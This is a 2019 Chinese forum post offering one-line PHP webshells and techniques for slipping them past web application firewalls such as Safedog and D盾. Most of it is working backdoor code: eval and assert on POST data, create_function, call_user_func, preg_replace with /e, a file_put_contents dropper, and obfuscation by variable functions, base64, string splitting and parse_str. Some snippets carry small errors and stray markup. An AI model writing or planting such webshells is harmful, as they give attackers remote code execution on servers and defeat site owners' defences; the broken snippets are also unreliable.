找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 3083|回复: 1

2019年PHP最新过狗一句话

[复制链接]

191

主题

52

回帖

402

积分

校长

ITbang.net

热心值
4
IT币
12019
贡献值
0

活跃会员灌水之王热心会员在线达人VIP专属我是MM我是GGIT帮探路者荣誉管理

发表于 2019-7-21 07:56:43 | 显示全部楼层 |阅读模式
什么是一句话木马
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

我们如何发送命令,发送的命令如何执行?
我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。
所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

例如:
  1. <font color="#ff0000"><?php eval(@$_POST['a']); ?></font>
复制代码

其中eval就是执行命令的函数,$_POST['a']就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

示例:



因为木马是接收post请求中 “a” 的数据( $_POST[‘a’]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,( 就像这样: http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。

使用 其他函数制作一句话木马assert函数
  1. <?php assert(@$_POST['a']); ?>
复制代码

create_function函数
  1. <?php
  2. $fun = create_function('',$_POST['a']);
  3. $fun();
  4. ?>
复制代码

把用户传递的数据生成一个函数fun(),然后再执行fun()
call_user_func回调函数
  1. <?php
  2. @call_user_func(assert,$_POST['a']);
  3. ?>
复制代码

call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。
preg_replace函数
  1. <div class="blockcode"><blockquote><?php
  2. @preg_replace("/abcde/e", $_POST['a'], "abcdefg");
  3. ?>
复制代码


这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
file_put_contents函数
利用函数生成木马
  1. <div class="blockcode"><blockquote><?php
  2. $test='<?php $a=$_POST["cmd"];assert($a); ?>';
  3. file_put_contents("Trojan.php", $test);
  4. ?>
复制代码


函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。
如何让一句话木马绕过waf ?
waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。
PHP变量函数
  1. <div class="blockcode"><blockquote><?php
  2. $a = "eval";
  3. $a(@$_POST['a']);
  4. ?>
复制代码


第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。
PHP可变变量
  1. <?php
  2. $bb="eval";
  3. $a="bb";
  4. $aa($_POST['a']);
  5. ?>
复制代码

看这句就能理解上述语句:$$aa = $($aa) = $ (‘bb’) = $bb = "eval"
str_replace函数
  1. <div class="blockcode"><blockquote><?php
  2. $a=str_replace("Waldo", "", "eWaldoval");
  3. $a(@$_POST['a']);
  4. ?>
复制代码


函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。
base64_decode函数
  1. <div class="blockcode"><blockquote><?php
  2. $a=base64_decode("ZXZhbA==")
  3. $a($_POST['a']);
  4. ?>
复制代码


这里是base64解密函数,"ZXZhbA=="是eval的base64加密。
"."操作符
  1. <div class="blockcode"><blockquote><?php
  2. $a="e"."v";
  3. $b="a"."l";
  4. $c=$a.$b;
  5. $c($_POST['a']);
  6. ?>
复制代码


parse_str函数
  1. <div class="blockcode"><blockquote><?php
  2. $str="a=eval";
  3. parse_str($str);
  4. $a($_POST['a']);
  5. ?>
复制代码


执行这个函数后,生成一个变量$a,值为字符串"eval"
更多技巧...
多实战,多谷歌!
上述六种技巧每一种单独使用都不能绕过waf,但是与 第三大点提到的函数混合起来使用,就可以顺利的欺骗waf。
tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
再来一个小栗子
  1. <?php function fun(){return $_POST['a'];}@preg_replace("/test/e",fun(),"test test test");?>
复制代码

这里又有一个技巧,创建函数 fun(),返回post中“a”的数据。我的这个例子很明显是一句话木马,但是安全狗却扫不出,D盾也是如此。



ITbang.Net是一个IT教程分享社区!

寻找论坛资源请善用论坛搜索功能,这样会为你节约不少学习时间;

论坛资源如有过期链接失效等,请到教程反馈区发帖反馈,我们会为您良好的行为点赞加分!

回复

使用道具 举报

0

主题

12

回帖

13

积分

小学生

热心值
0
IT币
1
贡献值
0
发表于 2019-8-7 09:55:29 | 显示全部楼层
看了LZ的帖子,我只想说一句很好很强大!

ITbang.Net是一个IT教程分享社区!

寻找论坛资源请善用论坛搜索功能,这样会为你节约不少学习时间;

论坛资源如有过期链接失效等,请到教程反馈区发帖反馈,我们会为您良好的行为点赞加分!

回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

免责声明:
IT帮论坛所发布的一切视频资源、工具软件和网络技术相关的文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该资源,请支持正版软件,购买注册,得到更好的正版服务。

Mail To:Service@ITbang.Net

QQ|Archiver|手机版|小黑屋|IT帮社区 ( 冀ICP备19002104号-2 )

GMT+8, 2025-5-3 22:57 , Processed in 0.158925 second(s), 22 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表